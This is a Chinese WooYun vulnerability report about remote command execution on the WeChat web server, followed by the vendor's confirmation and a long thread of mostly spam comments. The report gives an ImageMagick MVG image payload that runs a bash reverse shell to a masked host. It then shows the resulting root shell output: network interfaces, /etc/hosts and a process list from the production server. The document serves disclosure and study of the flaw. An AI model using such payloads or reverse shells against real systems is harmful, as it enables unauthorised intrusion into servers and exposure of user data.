微信网页版服务器存在远程命令执行漏洞

2017年4月30日09:03:17评论621 views字数 198阅读0分39秒阅读模式

摘要

2016-05-05：细节已通知厂商并且等待厂商处理中
2016-05-10：厂商已经确认，细节仅向厂商公开
2016-05-20：细节向核心白帽子及相关领域专家公开
2016-05-30：细节向普通白帽子公开
2016-06-09：细节向实习白帽子公开
2016-06-24：细节向公众公开

漏洞概要关注数(305) 关注此漏洞

缺陷编号： WooYun-2016-205514

漏洞标题：微信网页版服务器存在远程命令执行漏洞

漏洞作者：猪猪侠

提交时间： 2016-05-05 22:47

公开时间： 2016-06-24 10:30

漏洞类型：命令执行

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

25人收藏

漏洞详情

披露状态：

简要描述：

微信网页版服务器存在远程命令执行漏洞，root权限，呵呵

详细说明：

#1 存在漏洞服务器地址

https://wx2.qq.com/

#2 与自己聊天发送一个图片

#3 payload

code 区域

push graphic-context 
 viewbox 0 0 640 480 
 fill 'url(https://"|/bin/bash -i >& /dev/tcp/*.*.*.*/8080 0>&1")'
 pop graphic-context

漏洞证明：

#4 获得一个远程SHELL

code 区域

*.*:~# /sbin/ifconfig -a
 eth0      Link encap:Ethernet  HWaddr *.**.**.*
           inet addr:223.167.*.*  Bcast:223.167.*.*  Mask:255.255.255.128
           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
           RX packets:207675290974 errors:0 dropped:0 overruns:0 frame:0
           TX packets:381824340869 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000 
           RX bytes:64553957542020 (61563451.3 Mb)  TX bytes:484719339307282 (462264384.5 Mb)
 
 eth1      Link encap:Ethernet  HWaddr *.**.**.**.*
           inet addr:10.54.*.*  Bcast:10.54.*.*  Mask:255.255.255.192
           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
           RX packets:79387181028 errors:0 dropped:0 overruns:0 frame:0
           TX packets:233634377039 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000 
           RX bytes:604955868080734 (576930873.9 Mb)  TX bytes:262973934281267 (250791487.0 Mb)
 
 ip6tnl0   Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  
           NOARP  MTU:1460  Metric:1
           RX packets:0 errors:0 dropped:0 overruns:0 frame:0
           TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:0 
           RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
 
 lo        Link encap:Local Loopback  
           inet addr:127.0.0.1  Mask:255.0.0.0
           inet6 addr: ::1/128 Scope:Host
           UP LOOPBACK RUNNING  MTU:16436  Metric:1
           RX packets:532406147 errors:0 dropped:0 overruns:0 frame:0
           TX packets:532406147 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:0 
           RX bytes:14164026742798 (13507868.5 Mb)  TX bytes:14164026742798 (13507868.5 Mb)
 
 sit0      Link encap:IPv6-in-IPv4  
           NOARP  MTU:1480  Metric:1
           RX packets:0 errors:0 dropped:0 overruns:0 frame:0
           TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:0 
           RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
 
 tunl0     Link encap:IPIP Tunnel  HWaddr   
           NOARP  MTU:1480  Metric:1
           RX packets:0 errors:0 dropped:0 overruns:0 frame:0
           TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:0 
           RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
 
 *.*:~# cat /etc/hosts
 #
 # hosts         This file describes a number of hostname-to-address
 #               mappings for the TCP/IP subsystem.  It is mostly
 #               used at boot time, when no name servers are running.
 #               On small systems, this file can be used instead of a
 #               "named" name server.
 # Syntax:
 #    
 # IP-Address  Full-Qualified-Hostname  Short-Hostname
 #
 
 127.0.0.1     Tencent64.site Tencent64 localhost
 
 # special IPv6 addresses

code 区域

root      4307     1  0 Apr08 ?        00:00:27 /usr/local/agenttools/agent/agent -c /usr/local/agenttools/agent/client.conf
 root      4323     1  0 Apr08 ?        00:00:03 /usr/local/agenttools/agent/agentPlugInD
 root      4341     1  0 Apr08 ?        01:37:02 /usr/local/agenttools/agent/base -d5 -c1 -m4 -s /usr/local/agenttools/agent/base.conf
 root      4350     1  0 Apr08 ?        00:00:49 /usr/local/agenttools/agent/tcvmstat
 root      4449     1  0 Apr08 ?        00:01:49 /usr/local/agenttools/agent/sysddd
 root      6234     2  0 Jan18 ?        00:19:57 [flush-8:0]
 root      6664     1  0 Jan20 ?        00:00:07 nws-watchdog
 root      6665  6664  0 Jan20 ?        07:37:33 nws:http.so,worker_0-2
 root      6692     2  0 Jan18 ?        00:04:48 [kjournald]
 root      6693     2  0 Jan18 ?        00:05:46 [kjournald]
 100       7321     1  0 Jan18 ?        00:00:05 /usr/bin/dbus-daemon --system
 root      7341     1  0 Jan18 ?        00:00:01 /usr/sbin/hald --daemon=yes --retain-privileges
 root      7682     1  0 15:37 ?        00:00:00 /bin/sh /usr/local/sa/agent/watchdog.sh
 root      8028     1  0 15:37 ?        00:00:18 /usr/local/sa/agent/secu-tcs-agent
 root      8036     1  0 Jan18 ?        00:00:00 /usr/local/sbin/sshd -f /etc/ssh2/sshd2_config.l
 root      8045     1  0 Jan18 ?        00:00:00 /usr/local/sbin/sshd

修复方案：

# 补丁

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-05-10 10:29

厂商回复：

非常感谢您的报告，IM组件的问题，已经有白帽子在tsrc平台报告过，此问题我们已经第一时间紧急处理。感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-05-05 22:47 | Q1NG ( 普通白帽子 | Rank:148 漏洞数:27 | 临兵斗者皆阵列前行 !)

0

666666

1# 回复此人
2016-05-05 22:48 | T-rex丶Jim ( 普通白帽子 | Rank:140 漏洞数:37 )

0

前排

2# 回复此人
2016-05-05 22:51 | mango ( 核心白帽子 | Rank:2185 漏洞数:312 | 解决问题的第一步，是要承认问题的存在。)

1

666666

3# 回复此人
2016-05-05 22:52 | a10ooon3 ( 实习白帽子 | Rank:71 漏洞数:21 | 努力学习，多挖洞。(~˘▾˘)~)

0

前排瓜子饮料

4# 回复此人
2016-05-05 22:53 | Beep ( 实习白帽子 | Rank:80 漏洞数:5 | 专注PHP漏洞挖掘)

0

6666

5# 回复此人
2016-05-05 22:55 | 侦探911 ( 普通白帽子 | Rank:164 漏洞数:27 | 学习)

0

woc...简直了

6# 回复此人
2016-05-05 22:56 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号：233sec 不定期分享各种漏洞思...)

0

简直了。。

7# 回复此人
2016-05-05 23:03 | toomi ( 路人 | Rank:12 漏洞数:4 | 小菜一枚)

0

简直了

8# 回复此人
2016-05-05 23:05 | 鱼化石 ( 实习白帽子 | Rank:93 漏洞数:18 | 介绍不能为空)

2

为表感谢，我们申请了一台iPhone6S,请联系我们领取。

9# 回复此人
2016-05-05 23:07 | 默之 ( 普通白帽子 | Rank:1615 漏洞数:254 | 沉淀。)

0

逆天了！！！

10# 回复此人
2016-05-05 23:20 | wkmc ( 路人 | Rank:13 漏洞数:2 | 挖不完的洞洞，补不完的丁丁)

0

为表感谢，我们申请了一台iPhone6SSSS ,请联系马化腾领取。

11# 回复此人
2016-05-05 23:23 | Sai、 ( 路人 | Rank:14 漏洞数:4 | for fun……)

0

猪哥姿势就是多

12# 回复此人
2016-05-05 23:28 | Submit ( 普通白帽子 | Rank:565 漏洞数:132 | )

0

999

13# 回复此人
2016-05-05 23:48 | Mark0smith ( 普通白帽子 | Rank:176 漏洞数:71 )

1

666666

14# 回复此人
2016-05-06 00:02 | autO_pw ( 实习白帽子 | Rank:81 漏洞数:25 | o_O``)

0

6666666666666666666

15# 回复此人
2016-05-06 00:07 | jguoguo ( 路人 | Rank:6 漏洞数:2 | test)

0

呵呵

16# 回复此人
2016-05-06 00:15 | zhighest ( 路人 | Rank:2 漏洞数:2 | ....)

4

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

17# 回复此人
2016-05-06 00:52 | 指尖上的故事 ( 普通白帽子 | Rank:794 漏洞数:175 | 放手不是我们不合适 | 而是成就你们更适合)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

18# 回复此人
2016-05-06 05:50 | 玄道 ( 普通白帽子 | Rank:142 漏洞数:42 | 就是注入就是注入注入)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

19# 回复此人
2016-05-06 06:14 | 孤零落叶寒 ( 普通白帽子 | Rank:196 漏洞数:28 | 今天的跌倒是是为了明天更好的站着)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

20# 回复此人
2016-05-06 07:45 | nick被注册 ( 普通白帽子 | Rank:152 漏洞数:25 | 天一)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

21# 回复此人
2016-05-06 07:57 | CHai ( 路人 | Rank:1 漏洞数:1 | 萌新。)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

22# 回复此人
2016-05-06 08:09 | Toom ( 路人 | Rank:6 漏洞数:3 | 啊)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

23# 回复此人
2016-05-06 08:16 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

0

1 rank. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

24# 回复此人
2016-05-06 08:18 | luwikes ( 普通白帽子 | Rank:552 漏洞数:83 | 潜心学习~~~)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

25# 回复此人
2016-05-06 08:22 | Arthur ( 实习白帽子 | Rank:85 漏洞数:35 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

26# 回复此人
2016-05-06 08:29 | 永不言弃 ( 路人 | Rank:19 漏洞数:8 | 敏锐者)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

27# 回复此人
2016-05-06 08:32 | 曾经沧海难为水 ( 路人 | Rank:7 漏洞数:4 | 专业维修核潜艇、反应堆,核弹头翻新,抛光,...)

0

RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

28# 回复此人
2016-05-06 08:40 | tSt ( 普通白帽子 | Rank:109 漏洞数:30 | 在开发里运维最强，运维里网络最强，网络里...)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

29# 回复此人
2016-05-06 08:44 | 打电话叫人 ( 普通白帽子 | Rank:422 漏洞数:114 | 没事，我打电话叫人)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

30# 回复此人
2016-05-06 08:47 | 大王派我来巡山-HS ( 路人 | Rank:8 漏洞数:2 | 搞牛奶的渗透玩的比较6的，渗透行业牛奶搞...)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

31# 回复此人
2016-05-06 08:48 | 屠夫 ( 路人 | Rank:8 漏洞数:3 | 乌云最帅的白帽子)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

32# 回复此人
2016-05-06 08:48 | 傻强_在路上 ( 路人 | Rank:30 漏洞数:2 | 安全路上小小小小白一枚)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

33# 回复此人
2016-05-06 08:55 | 风格 ( 实习白帽子 | Rank:37 漏洞数:12 | 注册为白帽子，你可以在这里提交你发现的漏...)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

34# 回复此人
2016-05-06 08:59 | js2012 ( 普通白帽子 | Rank:126 漏洞数:44 | 闭关修炼。。。)

0

你们这样排队真的号码？ T_T

35# 回复此人
2016-05-06 09:02 | hating ( 路人 | Rank:4 漏洞数:2 | 所有的设备界面皆为前端，纯粹的理性思维归...)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

36# 回复此人
2016-05-06 09:08 | 土豆俠 ( 路人 | Rank:2 漏洞数:1 | 我爱吃土豆)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

37# 回复此人
2016-05-06 09:10 | Q1NG ( 普通白帽子 | Rank:148 漏洞数:27 | 临兵斗者皆阵列前行 !)

0

各位审核大哥,求审核, 感激不尽

38# 回复此人
2016-05-06 09:32 | masker ( 路人 | Rank:6 漏洞数:2 | 大洞我不敢交，小洞乌云不想收。)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

39# 回复此人
2016-05-06 09:43 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:490 漏洞数:133 | 乌云核心绿帽子《绿帽子讲婚姻安全》作者)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

40# 回复此人
2016-05-06 09:46 | 陆由乙 ( 普通白帽子 | Rank:620 漏洞数:137 | 我是突突兔！)

0

为啥雷没了。

41# 回复此人
2016-05-06 10:05 | HADESIDD ( 路人 | Rank:10 漏洞数:4 | 但行好事，莫问前程)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

42# 回复此人
2016-05-06 10:10 | Mazing ( 路人 | Rank:27 漏洞数:7 )

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

43# 回复此人
2016-05-06 10:10 | 指尖上的故事 ( 普通白帽子 | Rank:794 漏洞数:175 | 放手不是我们不合适 | 而是成就你们更适合)

0

原来那些大站刷爆了的远程执行命令漏洞就是imagemagic啊啥时候放出exp啊

44# 回复此人
2016-05-06 10:11 | 猪猪侠 ( 核心白帽子 | Rank:5372 漏洞数:415 | 你都有那么多超级棒棒糖了，还要自由干吗？)

0

@陆由乙有人觉得微信不够屌，不够打雷的标准，就投诉到管理员哪里去了

45# 回复此人
2016-05-06 10:31 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:490 漏洞数:133 | 乌云核心绿帽子《绿帽子讲婚姻安全》作者)

0

@猪猪侠我擦，这都能投诉……唉……见不得别人好啊？劣性……

46# 回复此人
2016-05-06 10:31 | sol0king ( 路人 | Rank:20 漏洞数:1 | 膜拜大牛)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

47# 回复此人
2016-05-06 10:42 | 独奏大表哥 ( 路人 | Rank:2 漏洞数:1 | ../)

0

RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

48# 回复此人
2016-05-06 11:01 | 蜀骷卿 ( 实习白帽子 | Rank:53 漏洞数:14 | 爱好互联网，为网络安全做出贡献)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

49# 回复此人
2016-05-06 11:44 | 深蓝 ( 普通白帽子 | Rank:1174 漏洞数:256 | 我就静静的看着你装逼，我就是不理你。)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

50# 回复此人
2016-05-06 11:52 | 平安好房电子商务有限公司(乌云厂商)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

51# 回复此人
2016-05-06 11:53 | AirCrk ( 路人 | Rank:2 漏洞数:1 | 请多指教。)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

52# 回复此人
2016-05-06 11:53 | scanf ( 核心白帽子 | Rank:1694 漏洞数:239 | 。)

0

我擦雷都没有了投诉的人什么想法

53# 回复此人
2016-05-06 11:54 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

0

@平安好房电子商务有限公司 TX宣布封杀你的广告。哈哈

54# 回复此人
2016-05-06 12:13 | Discover ( 实习白帽子 | Rank:37 漏洞数:15 )

0

@指尖上的故事早放了，星期二就爆了

55# 回复此人
2016-05-06 12:14 | Discover ( 实习白帽子 | Rank:37 漏洞数:15 )

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

56# 回复此人
2016-05-06 12:36 | adminss ( 路人 | Rank:24 漏洞数:19 | ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇...)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

57# 回复此人
2016-05-06 12:43 | Any3ite ( 路人 | Rank:26 漏洞数:12 | 土耳其web 国内的我就看看不说话)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

58# 回复此人
2016-05-06 12:44 | Agony ( 路人 | Rank:24 漏洞数:12 | you know a cat has nine lives.)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

59# 回复此人
2016-05-06 12:49 | gainover ( 普通白帽子 | Rank:1805 漏洞数:97 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

0

@猪猪侠 = =，现在还有这种投诉。。。。

60# 回复此人
2016-05-06 12:57 | 过客 ( 实习白帽子 | Rank:42 漏洞数:13 )

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

61# 回复此人
2016-05-06 13:20 | 浮萍 ( 普通白帽子 | Rank:1077 漏洞数:217 )

0

居然还能投诉

62# 回复此人
2016-05-06 13:24 | lvalue ( 路人 | Rank:0 漏洞数:1 | hi)

0

666666

63# 回复此人
2016-05-06 14:47 | Taro ( 普通白帽子 | Rank:349 漏洞数:86 | 走向最远的方向，哪怕前路迷茫；抱着最大的...)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

64# 回复此人
2016-05-06 17:06 | 秦风 ( 实习白帽子 | Rank:40 漏洞数:10 | 血染江山的画怎敌妳眉间一点朱砂覆...)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

65# 回复此人
2016-05-06 17:12 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

66# 回复此人
2016-05-06 17:22 | Lykan算什么 ( 路人 | Rank:6 漏洞数:2 | 这家伙太叼，什么都没有留下。)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

67# 回复此人
2016-05-06 18:06 | wybang ( 普通白帽子 | Rank:199 漏洞数:56 | wybang)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

68# 回复此人
2016-05-07 07:14 | sysALong ( 普通白帽子 | Rank:464 漏洞数:100 | 在我们黑龙江这噶哒，就没有什么事是【撸串...)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。。

69# 回复此人
2016-05-07 12:46 | 小白在闭关 ( 路人 | Rank:10 漏洞数:3 | 安全小白，科研屌丝。)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。。

70# 回复此人
2016-05-07 16:15 | Time_泽~少 ( 路人 | Rank:13 漏洞数:9 | 计算机专业/网络安全技术)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

71# 回复此人
2016-05-07 16:27 | Agony ( 路人 | Rank:24 漏洞数:12 | you know a cat has nine lives.)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

72# 回复此人
2016-05-07 18:10 | 华不再扬 ( 实习白帽子 | Rank:39 漏洞数:7 | 热爱安全。)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

73# 回复此人
2016-05-09 09:38 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀，伊雅伊尔哟。)

0

卧槽。。。

74# 回复此人
2016-05-09 10:23 | 键盘手 ( 路人 | Rank:12 漏洞数:4 | @!@)

0

腾讯这是要不吊你们的节奏啊

75# 回复此人
2016-05-09 10:37 | prolog ( 普通白帽子 | Rank:944 漏洞数:197 )

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

76# 回复此人
2016-05-09 11:49 | 土巴兔装修网(乌云厂商)

0

是漏洞就承认就修复，就感谢测试的白帽子，一个厂商的态度必须如此简单高效

77# 回复此人
2016-05-09 15:35 | 未了 ( 路人 | Rank:2 漏洞数:3 )

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

78# 回复此人
2016-05-09 17:00 | 习总夸我好青年 ( 路人 | Rank:2 漏洞数:1 | 刚来的,请多关照)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

79# 回复此人
2016-05-09 23:10 | 方大核桃 ( 普通白帽子 | Rank:193 漏洞数:59 | 要怎么长大,才能赢过时间啊)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

80# 回复此人
2016-05-10 11:22 | 龍、 ( 普通白帽子 | Rank:474 漏洞数:163 | 你若安好我就是晴天)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

81# 回复此人
2016-05-10 11:41 | 举起手来 ( 核心白帽子 | Rank:1957 漏洞数:204 | 准备好，举起手来！)

0

@土巴兔装修网正能量

82# 回复此人
2016-05-10 12:08 | 机器猫 ( 普通白帽子 | Rank:1358 漏洞数:291 | 爱生活、爱腾讯、爱网络！一个有梦想的16岁...)

0

同样已经被人提交过了为何猪猪侠不忽略呢，因为是猪猪侠？

83# 回复此人
2016-05-10 12:27 | 夏雨痕 ( 路人 | Rank:17 漏洞数:7 | 小白不容易啊.)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

84# 回复此人
2016-05-11 08:57 | 傻强_在路上 ( 路人 | Rank:30 漏洞数:2 | 安全路上小小小小白一枚)

0

同样已经被人提交过了为何猪猪侠不忽略呢，因为是猪猪侠？

85# 回复此人
2016-05-12 09:37 | 少宇 ( 实习白帽子 | Rank:62 漏洞数:19 | QQ ：1126179674 By : 少宇 http://www.90...)

0

非常感谢您的报告，IM组件的问题，已经有白帽子在tsrc平台报告过，此问题我们已经第一时间紧急处理。感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈

86# 回复此人
2016-05-16 17:16 | 4416 ( 实习白帽子 | Rank:31 漏洞数:10 | 衣来伸手饭来张口2B型泡妞高手！)

0

666

87# 回复此人
2016-05-17 16:18 | monburan ( 路人 | Rank:6 漏洞数:3 | 对这个世界的知识充满好奇)

0

1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

88# 回复此人

漏洞概要 关注数(305) 关注此漏洞

缺陷编号： WooYun-2016-205514

漏洞标题： 微信网页版服务器存在远程命令执行漏洞

相关厂商： 腾讯

漏洞作者： 猪猪侠

提交时间： 2016-05-05 22:47

公开时间： 2016-06-24 10:30

漏洞类型： 命令执行

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

25人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(305) 关注此漏洞

漏洞标题：微信网页版服务器存在远程命令执行漏洞

相关厂商：腾讯

漏洞作者：猪猪侠

漏洞类型：命令执行

危害等级：高

漏洞状态：厂商已经确认

Tags标签：无

版权声明：转载请注明来源猪猪侠@乌云

漏洞评价(共0人评价):

登陆后才能进行评分